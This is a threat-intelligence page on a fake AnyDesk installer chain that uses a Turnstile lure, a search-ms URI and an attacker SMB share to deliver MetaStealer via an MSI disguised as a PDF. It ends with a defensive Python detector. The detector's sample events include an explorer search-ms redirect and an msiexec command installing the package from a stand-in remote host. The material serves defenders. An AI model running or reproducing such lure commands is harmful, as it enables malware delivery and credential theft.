Fake AnyDesk installer chain using Turnstile, search-ms, and MSI-delivered MetaStealer
Technical Analysis
Summary
A fake AnyDesk installer chain uses a fake Cloudflare Turnstile lure, Windows File Explorer, and a search-ms URI to steer victims to an attacker-controlled SMB share, where MetaStealer is delivered through an MSI package disguised as Readme Anydesk.pdf. The chain raises the risk of credential theft and file theft by blending a browser lure with Windows-native prompts and masqueraded files. The delivery path is known only from Huntress reporting and covers the MetaStealer infection, not a broader malware set.
Related Happenings
TCLBANKER banking trojan activity targeting 59 financial platforms
Malware Activity
First: 08.05.2026 21:12
Last: 08.05.2026 21:12
Sources 1
About this happening:
**TCLBANKER** is a newly documented **Brazilian banking trojan** that can hit **59 banking, fintech, and cryptocurrency platforms**, increasing the risk of credential theft and re...
Vercel v0.dev phishing campaign using GenAI-built lure pages
Campaign
First: 07.05.2026 11:30
Last: 07.05.2026 11:30
Sources 1
About this happening:
A campaign using **Vercel v0.dev** to build **highly convincing phishing pages** has lowered the skill and cost needed to run fraudulent sign-in and job-lure attacks. The activity...
Silver Fox tax-themed phishing campaign delivering ABCDoor and ValleyRAT
Campaign
First: 04.05.2026 14:57
Last: 04.05.2026 14:57
Sources 1
About this happening:
**Silver Fox** is running a **tax-themed phishing campaign** that now targets **India** with **Income Tax Department** lures and delivers **ValleyRAT (aka Winos 4.0)**. The campai...
Formbook phishing campaign using DLL sideloading and obfuscated JavaScript
Campaign
First: 20.04.2026 18:01
Last: 20.04.2026 18:01
Sources 1
About this happening:
The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Timeline
17.09.2025 17:01 · 3 articles
Huntress reports fake AnyDesk MetaStealer chain and Cephalus incidents
Technical Analysis Update
Huntress analysts reported increased threat activity over the past fifteen business days, including a fake AnyDesk installer that used a fake Cloudflare Turnstile lure, Windows File Explorer with a search-ms URI redirect, an attacker-controlled SMB share, and an MSI package disguised as Readme Anydesk.pdf to deploy MetaStealer. The same reporting also noted two Cephalus ransomware incidents that used DLL sideloading through SentinelBrowserNativeHost.exe from SentinelOne to launch the payload.
Sources:
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- From MostereRAT to ClickFix: New Malware Campaigns Highlight Rising AI and Phishing Risks — thehackernews.com — 09.09.2025 13:27
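The chain described in the summary and in the timeline entry above (Turnstile lure, search-ms URI, attacker-controlled SMB share, MSI disguised as a PDF) leaves two process-creation artifacts a defender can key on: Explorer being handed a search-ms: URI whose location crumb is a UNC path, and msiexec.exe installing a package from that share under a document-like name. The Python below is an added example, not code from Huntress or from this page. It runs both heuristics over constructed Sysmon-style process creation records (field names Image and CommandLine) and correlates them into a chain alert; the host 203.0.113.10, the share name and the package path are made up, with the package name modelled on the reported Readme Anydesk.pdf lure.

```python
"""Detection heuristics for the search-ms -> SMB share -> masqueraded MSI chain.

Added example (not Huntress's or the page's code). Events are constructed in
the shape of Sysmon Event ID 1 fields (Image, CommandLine); hosts, share and
file names are invented.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# search-ms: URI whose "crumb=location:" points at a UNC path (\\host\share...)
SEARCH_MS_UNC = re.compile(r'search-ms:[^"\s]*?location:(\\\\[^&"\s]+)', re.I)
# \\host\share... -> capture the host
UNC_PATH = re.compile(r'^\\\\([^\\\s]+)(?:\\|$)')
# package names that carry a document extension (".pdf", ".pdf.msi", ...)
DOC_LOOKALIKE = re.compile(r'\.(?:pdf|docx?|xlsx?|txt)(?:\.|$)', re.I)
MSI_SWITCHES = {"i", "package", "a", "p"}  # switches whose next token is a package


@dataclass
class ProcEvent:
    image: str          # Sysmon Image
    command_line: str   # Sysmon CommandLine


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _tokens(cmdline):
    """Split a Windows command line, honouring double quotes (quotes dropped)."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def search_ms_unc_target(cmdline):
    """UNC path a search-ms: URI points at, or None. The command line is
    percent-decoded first: protocol handlers often pass \\ as %5C%5C."""
    m = SEARCH_MS_UNC.search(unquote(cmdline))
    return m.group(1) if m else None


def unc_host(path):
    m = UNC_PATH.match(path)
    return m.group(1).lower() if m else None


def msi_package(cmdline):
    """Package path from an msiexec command line: the argument after /i, /a,
    /p or /package, else the first non-switch argument (double-click launch)."""
    toks = _tokens(cmdline)
    for i in range(1, len(toks) - 1):
        if toks[i].lstrip("/-").lower() in MSI_SWITCHES:
            return toks[i + 1]
    for t in toks[1:]:
        if not t.startswith(("/", "-")) and "=" not in t:
            return t
    return None


def event_findings(ev):
    """Per-event findings for the two observable stages of the chain."""
    findings = []
    target = search_ms_unc_target(ev.command_line)   # any image: the handler may vary
    if target:
        findings.append(("search_ms_to_unc_share", target))
    if _basename(ev.image) == "msiexec.exe":
        pkg = msi_package(ev.command_line)
        if pkg:
            if unc_host(pkg):
                findings.append(("msi_package_on_unc_share", pkg))
            if DOC_LOOKALIKE.search(_basename(pkg)):
                findings.append(("msi_package_named_like_document", pkg))
    return findings


def detect_chain(events):
    """Correlate across events: an msiexec package pulled from the same host
    an earlier search-ms: URI pointed at is the full chain.
    Returns (event_index, rule, detail) tuples in the order they fire."""
    alerts, seen_hosts = [], set()
    for idx, ev in enumerate(events):
        for rule, detail in event_findings(ev):
            alerts.append((idx, rule, detail))
            if rule == "search_ms_to_unc_share":
                seen_hosts.add(unc_host(detail))
            elif rule == "msi_package_on_unc_share" and unc_host(detail) in seen_hosts:
                alerts.append((idx, "search_ms_then_msi_from_same_share", unc_host(detail)))
    return alerts


# Constructed sample: two chain events and two benign look-alikes.
SAMPLE_EVENTS = [
    # browser hands Explorer a percent-encoded search-ms: URI aimed at a remote share
    ProcEvent(r"C:\Windows\explorer.exe",
              r'"C:\Windows\explorer.exe" "search-ms:query=AnyDesk&crumb=location%3A%5C%5C203.0.113.10%5Cshare&displayname=Downloads"'),
    # user opens the masqueraded package from that share (name modelled on the lure)
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r'"C:\Windows\System32\msiexec.exe" /i "\\203.0.113.10\share\Readme Anydesk.pdf"'),
    # benign: local Windows Search query
    ProcEvent(r"C:\Windows\explorer.exe",
              r'"C:\Windows\explorer.exe" "search-ms:query=invoice&crumb=location:C:\Users\alice\Documents"'),
    # benign: local installer
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\alice\Downloads\vendor-tool.msi" /qn'),
]

if __name__ == "__main__":
    for idx, rule, detail in detect_chain(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {detail}")
```

The Turnstile page itself leaves no endpoint artifact, so the example starts where Explorer is invoked. Decoding the URI before matching matters because search-ms: links are commonly percent-encoded; correlating on the share host means an installer pulled from any other remote path is still reported on its own, just without the chain alert.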